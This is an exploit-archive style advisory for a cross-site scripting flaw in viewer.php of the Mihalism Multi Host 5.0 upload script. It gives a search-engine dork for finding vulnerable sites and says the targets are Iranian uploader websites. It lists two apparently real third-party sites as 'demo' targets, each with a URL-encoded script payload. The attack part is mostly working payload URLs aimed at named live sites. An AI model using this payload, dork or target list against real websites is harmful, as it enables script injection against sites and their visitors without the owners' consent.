################################################## ################################################## #####################
# #
# Exploit Title : Mihalism Multi Host v 5.0 XSS Vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : www.mihalismscript.com (http://www.mihalismscript.com) #
# #
# Tested ON : All ver 0f Mihalism Multi Host #
# #
# Security Risk : Low #
# #
# Description : All target's iranian Uploader websites #
# #
# DorK : "intext:"powered by Mihalism Multi Host"" #
# #
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "viewer.php"
XSS Expl0iTs :
http://Target/viewer.php?is_random=45041&file=XSS Codes
Dem0 :
http://picoup.ir/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E 1%27%29%22%3E
Dem0 :
http://www.img.songsara.net/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E 1%27%29%22%3E